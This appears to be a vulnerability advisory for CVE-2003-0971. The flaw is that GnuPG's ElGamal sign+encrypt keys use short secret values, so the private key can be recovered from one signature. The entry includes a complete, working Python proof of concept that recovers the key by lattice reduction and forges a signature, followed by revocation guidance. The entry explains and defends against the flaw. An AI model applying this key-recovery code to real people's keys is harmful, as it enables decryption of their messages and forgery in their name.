PT-2003-1085 · Gnu · Gnupg
Phong Nguyen · Published 2003-12-02 · Updated 2017-10-11 · CVE-2003-0971

| CVSS v2.0 | 10 (High) |
| Vector | AV:N/AC:L/Au:N/C:C/I:C/A:C |
Name of the Vulnerable Software and Affected Versions
GnuPG versions 1.0.2 through 1.2.3
Description
The flaw is in how GnuPG 1.0.2 through 1.2.3 creates and uses ElGamal sign+encrypt keys (OpenPGP public-key algorithm 20). GnuPG never generated such keys by default; they could only be created with the --expert option, and the standard key layout (a DSA signing key with an ElGamal encrypt-only subkey, algorithm 16) is not affected. To speed up ElGamal operations, GnuPG chose both the secret exponent x and the per-operation random value k far shorter than p-1. That optimisation is harmless for encryption, but fatal for signing: an ElGamal signature (a, s) on a hash h satisfies h ≡ x·a + k·s (mod p-1), and when x and k are both small this single congruence has a unique small solution, which lattice reduction finds in well under a second. Anyone holding one signature made with a type 20 key can therefore recover the private key, and with it decrypt everything encrypted to the key and forge signatures in its name, which is the total loss of confidentiality and integrity reflected in the CVSS score. No interaction with the key owner is needed beyond obtaining a signature that was ever published, which is why the issue is rated as remotely exploitable.
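The congruence above, worked through in code. This is an added example, not GnuPG's source and not Nguyen's attack code; it uses the Mersenne prime 2^127 - 1 in place of GnuPG's roughly 1024-bit p, a fixed base G = 3, SHA-256 as the hash, 40-bit x and k (about a third of the modulus size, the proportion that makes the attack work), and a seeded RNG so the run is reproducible; the sample message and the seed are constructed. The recovery routine is slightly more general than the advisory: it solves any ElGamal signature whose x and k are both much shorter than p-1, whatever the exact sizes. Python 3.8 or later is needed for `pow(k, -1, N)`.

```python
import hashlib
import random
from fractions import Fraction
from math import gcd

P = 2**127 - 1      # Mersenne prime M127: toy stand-in for GnuPG's ~1024-bit p
N = P - 1           # ElGamal signature arithmetic is modulo p-1
G = 3               # base element; any element of Z_p^* works for this demonstration
SMALL_BITS = 40     # x and k are about a third of |p|, mirroring the "small k" optimisation


def egcd(a, b):
    """Extended Euclid: returns (g, u, v) with u*a + v*b == g == gcd(a, b)."""
    u0, v0, u1, v1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        u0, u1 = u1, u0 - q * u1
        v0, v1 = v1, v0 - q * v1
    return a, u0, v0


def digest(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def keygen(rng):
    """Short secret exponent x, as the affected releases chose it."""
    x = rng.getrandbits(SMALL_BITS) | 1 << (SMALL_BITS - 1)
    return x, pow(G, x, P)


def sign(x, msg, rng):
    """ElGamal signature as GnuPG 1.0.2-1.2.3 produced it, with a short nonce k."""
    while True:                      # k must be invertible modulo p-1
        k = rng.getrandbits(SMALL_BITS) | 1 << (SMALL_BITS - 1) | 1
        if gcd(k, N) == 1:
            break
    a = pow(G, k, P)
    s = pow(k, -1, N) * (digest(msg) - x * a) % N   # hence h == x*a + k*s (mod p-1)
    return a, s


def verify(y, msg, sig):
    a, s = sig
    return pow(G, digest(msg), P) == pow(y, a, P) * pow(a, s, P) % P


def lagrange_reduce(b1, b2):
    """Gauss/Lagrange reduction: the shortest basis of a 2-D integer lattice."""
    dot = lambda u, v: u[0] * v[0] + u[1] * v[1]
    if dot(b1, b1) > dot(b2, b2):
        b1, b2 = b2, b1
    while True:
        mu = round(Fraction(dot(b1, b2), dot(b1, b1)))
        b2 = (b2[0] - mu * b1[0], b2[1] - mu * b1[1])
        if dot(b2, b2) >= dot(b1, b1):
            return b1, b2
        b1, b2 = b2, b1


def recover_private_key(sig, msg):
    """Solve h == x*a + k*s (mod p-1) for the unique SMALL (x, k) from one signature."""
    (a, s), h, n = sig, digest(msg), N
    g = gcd(gcd(a, s), n)            # normalise so that gcd(a, s, n) == 1
    assert h % g == 0, "not a valid signature equation"
    a, s, h, n = a // g, s // g, h // g, n // g
    g1, alpha, beta = egcd(a, s)     # alpha*a + beta*s == g1
    gamma = egcd(g1, n)[1]           # gamma*g1 == 1 (mod n)
    u0, v0 = h * gamma * alpha % n, h * gamma * beta % n   # one (large) solution
    d = gcd(s, n)                    # basis of the lattice {(u, v): u*a + v*s == 0 (mod n)}
    n1 = n // d
    b1, b2 = lagrange_reduce((d, -a * pow(s // d, -1, n1) % n1), (0, n1))
    det = b1[0] * b2[1] - b1[1] * b2[0]          # Babai rounding: nearest lattice point
    c1 = round(Fraction(u0 * b2[1] - v0 * b2[0], det))
    c2 = round(Fraction(b1[0] * v0 - b1[1] * u0, det))
    return u0 - c1 * b1[0] - c2 * b2[0], v0 - c1 * b1[1] - c2 * b2[1]


def demo(seed=20031127):
    """Constructed instance: one key, one signature, full recovery and a forgery."""
    rng = random.Random(seed)
    x, y = keygen(rng)
    msg = b"constructed sample message signed with a type 20 key"
    sig = sign(x, msg, rng)
    assert verify(y, msg, sig)
    x_rec, k_rec = recover_private_key(sig, msg)
    forged = b"constructed forgery made with the recovered key"
    forgery_ok = verify(y, forged, sign(x_rec, forged, rng))
    return x, x_rec, k_rec, y, forgery_ok


if __name__ == "__main__":
    x, x_rec, k_rec, y, forgery_ok = demo()
    print(f"real x:      {x:#x}\nrecovered x: {x_rec:#x}  (match: {x == x_rec})")
    print("forged signature verifies under the victim's public key:", forgery_ok)
```

The recovery never touches the discrete logarithm: it only uses the public signature equation, so it is just as fast when p has 1024 bits and x and k have a few hundred, which is why the same keys were safe for encryption (where a small k only has to hide one session key) and hopeless for signing.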
Recommendations
Treat every ElGamal sign+encrypt key (type 20) created with GnuPG 1.0.2 through 1.2.3 as compromised: revoke it immediately and stop using it for signing and for decryption. Regenerating a type 20 key with an affected version does not help, because the new key is produced by the same flawed scheme; generate a replacement of the default type instead (a DSA primary key with an ElGamal encrypt-only subkey, algorithm 16), which is not affected, and re-sign or re-encrypt material that depended on the revoked key. To find affected keys, look for the upper-case algorithm letter G in GnuPG 1.x key listings (lower-case g is encrypt-only ElGamal and is safe), or for algorithm number 20 in the output of --list-keys --with-colons. Upgrade to a GnuPG release that no longer creates type 20 keys or accepts them for signing.
Fix
Upstream's response was to withdraw ElGamal sign+encrypt keys altogether rather than repair them: fixed GnuPG releases no longer generate type 20 keys or use them for signing, and the GnuPG advisory directs that all existing type 20 keys be revoked, since the private key must be assumed recoverable from any signature ever made with it.
Related Identifiers
Affected Products
Gnupg